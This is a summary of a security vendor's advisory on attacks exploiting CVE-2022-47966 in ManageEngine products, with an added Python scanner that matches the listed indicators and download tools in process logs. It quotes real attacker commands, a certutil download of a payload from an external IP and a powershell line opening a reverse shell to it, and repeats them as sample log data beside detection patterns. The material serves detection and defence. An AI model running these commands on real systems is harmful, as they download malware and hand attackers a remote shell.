Technical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966

Bitdefender Labs observed a global wave of opportunistic attacks exploiting CVE-2022-47966 in ManageEngine products, with 2,000–4,000 internet-facing servers potentially vulnerable. The advisory documents four attack clusters (Initial Access Brokers, Buhti Ransomware, Cobalt Strike with RAT-el, and cyber espionage) and offers patching and multi-layer defense recommendations.
#CVE-2022-47966 #ManageEngine #BuhtiRansomware #CobaltStrike #RAT-el

Keypoints

  • Vulnerability CVE-2022-47966 is a critical remote code execution flaw affecting 24 ManageEngine products.
  • Between 2,000 and 4,000 internet-accessible servers were identified as running vulnerable versions.
  • The report outlines four attack clusters: Initial Access Brokers, Buhti Ransomware, Cobalt Strike + RAT-el, and Cyber Espionage.
  • Attackers leverage automated scanners to locate vulnerable systems and deploy web shells for remote access.
  • The observed toolchain includes certutil.exe, bitsadmin.exe, powershell.exe, and curl.exe to download and run payloads.
  • Buhti Ransomware encrypts files and instructs victims to pay for a decryptor; AnyDesk is used for remote access.
  • Recommendations emphasize prompt patching, multi-layer endpoint protection, IP/domain/URL reputation, and detection/response capabilities (e.g., GravityZone XDR).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – CVE-2022-47966 used to gain unauthenticated remote code execution in ManageEngine products. Quote: “This Remote Code Execution vulnerability (CVSSv3 critical score 9.8) allows full takeover of the compromised system by unauthenticated threat actors.”
  • [T1046] Network Service Scanning – Automated scanners are used to identify vulnerable systems and automate compromises (spray-and-pray tactic). Quote: “Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray tactic).”
  • [T1505.003] Web Shell – A malicious payload (typically a webshell that gives the attacker remote administrative access) is deployed on the compromised server. Quote: “Malicious payload (typically a webshell to enable remote administration access) is deployed on compromised server.”
  • [T1105] Ingress Tool Transfer – Tools and payloads are downloaded or transferred to targets using certutil, bitsadmin, curl, and PowerShell. Quote: “certutil.exe -urlcache -f http://80.85.156[.]184:8085/cn.exe C:\cn.exe” and “powershell C:\cn.exe -e cmd.exe 80.85.156[.]184 443”
  • [T1059.001] PowerShell – PowerShell is used to execute payloads and commands. Quote: “powershell C:\cn.exe -e cmd.exe 80.85.156[.]184 443”
  • [T1021.001] Remote Services: Remote Desktop Protocol – RDP is enabled on a chosen port to provide remote access (e.g., “Enable RDP on port 8094”).
  • [T1486] Data Encrypted for Impact – Buhti Ransomware encrypts files and demands payment for decryption. Quote: “Your files are encrypted. We use strong encryption algorithms, so you cannot decrypt your data.”
  • [T1071] Application Layer Protocol – C2 traffic observed to a domain/IP (e.g., “Cobalt Strike beacon with C2 0xx1.kaspenskyupdates[.]com”).

Indicators of Compromise

  • [URLs] – http://80.85.156[.]184:8085/cn.exe, https://tmpfiles[.]org/dl/788858/any.txt
  • [IP Addresses] – 45.154.14[.]194, 149.28.57[.]130
  • [Domains] – 0xx1.kaspenskyupdates[.]com, icy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com
  • [MD5 Hash] – 9a1d9fe9b1223273c314632d04008384, e0fb946c00b140693e3cf5de258c22a1
  • [File] – AnyDesk.exe, cn.exe
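Added example (not code from the Bitdefender advisory): a small Python scanner that turns the download/execute toolchain listed under T1105 and T1059.001 and the indicators listed above into detection logic, and runs it over constructed process-creation events. The JSON event format and its field names (`host`, `cmdline`, `md5`), the host names, and every sample command line other than the two quoted in the advisory are assumptions; the indicators are the ones listed above, refanged for matching.

```python
import json
import re
from collections import defaultdict

# Indicators exactly as listed (defanged) in the advisory summary.
DEFANGED_IOCS = {
    "ip": ["80.85.156[.]184", "45.154.14[.]194", "149.28.57[.]130"],
    "domain": ["0xx1.kaspenskyupdates[.]com",
               "icy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com"],
    "url": ["http://80.85.156[.]184:8085/cn.exe",
            "https://tmpfiles[.]org/dl/788858/any.txt"],
    "md5": ["9a1d9fe9b1223273c314632d04008384",
            "e0fb946c00b140693e3cf5de258c22a1"],
}


def refang(indicator: str) -> str:
    """Convert a defanged indicator ("[.]") back into its matchable form."""
    return indicator.replace("[.]", ".")


# Lower-cased, refanged copies used for substring matching.
IOCS = {kind: [refang(v).lower() for v in vals] for kind, vals in DEFANGED_IOCS.items()}

# Command-line patterns for the download/execute toolchain named in the advisory
# (certutil, bitsadmin, curl, powershell), each tagged with its ATT&CK technique.
LOLBIN_RULES = [
    ("certutil_urlcache_download", "T1105",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\s-f\b", re.I)),
    ("bitsadmin_transfer", "T1105",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("curl_download", "T1105",
     re.compile(r"\bcurl(\.exe)?\b.*\bhttps?://", re.I)),
    ("powershell_web_download", "T1059.001",
     re.compile(r"\bpowershell(\.exe)?\b.*"
                r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)", re.I)),
    # powershell launching an executable that sits at a drive root, the shape of
    # the quoted "powershell C:\cn.exe ..." command.
    ("powershell_runs_drive_root_exe", "T1059.001",
     re.compile(r"\bpowershell(\.exe)?\s+[a-z]:\\[^\\\s]+\.exe\b", re.I)),
]

# Constructed process-creation events (JSON lines); the field names are an assumption.
# The first two srv-me-01 commands reproduce the command lines quoted in the advisory;
# the remaining lines are benign or hash-only events made up for this example.
SAMPLE_LOG = r"""
{"host": "srv-me-01", "cmdline": "certutil.exe -urlcache -f http://80.85.156.184:8085/cn.exe C:\\cn.exe"}
{"host": "srv-me-01", "cmdline": "powershell C:\\cn.exe -e cmd.exe 80.85.156.184 443"}
{"host": "srv-me-01", "cmdline": "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"}
{"host": "srv-me-02", "cmdline": "curl.exe -o C:\\Users\\Public\\any.txt https://tmpfiles.org/dl/788858/any.txt"}
{"host": "srv-me-02", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"}
{"host": "ws-07", "cmdline": "C:\\Users\\Public\\svc.exe", "md5": "9a1d9fe9b1223273c314632d04008384"}
"""


def scan_event(event: dict) -> list:
    """Return the findings for one process-creation event."""
    host = event.get("host", "?")
    cmd = event.get("cmdline", "")
    findings = []
    for name, technique, rx in LOLBIN_RULES:
        if rx.search(cmd):
            findings.append({"host": host, "rule": name, "technique": technique})
    low = cmd.lower()
    for kind in ("ip", "domain", "url"):
        for ioc in IOCS[kind]:
            if ioc in low:
                findings.append({"host": host, "rule": f"ioc_{kind}", "indicator": ioc})
    md5 = event.get("md5", "").lower()
    if md5 and md5 in IOCS["md5"]:
        findings.append({"host": host, "rule": "ioc_md5", "indicator": md5})
    return findings


def scan_log(lines) -> list:
    """Scan an iterable of JSON lines; blank lines are skipped."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            findings.extend(scan_event(json.loads(line)))
    return findings


def techniques_by_host(findings) -> dict:
    """Map each host to the sorted ATT&CK techniques its findings were tagged with."""
    out = defaultdict(set)
    for f in findings:
        if "technique" in f:
            out[f["host"]].add(f["technique"])
    return {h: sorted(t) for h, t in out.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for f in hits:
        print(f)
    print(techniques_by_host(hits))
```

The regex rules key on the download switches (`-urlcache -f`, `/transfer`, an `http(s)://` argument to curl) rather than on the binary names alone, so the benign `certutil -hashfile` and `powershell -File` events produce no findings; indicator hits are kept separate from technique tags because a plain substring match on an IP or URL says where a host talked to, not which technique was used.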

Read more: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966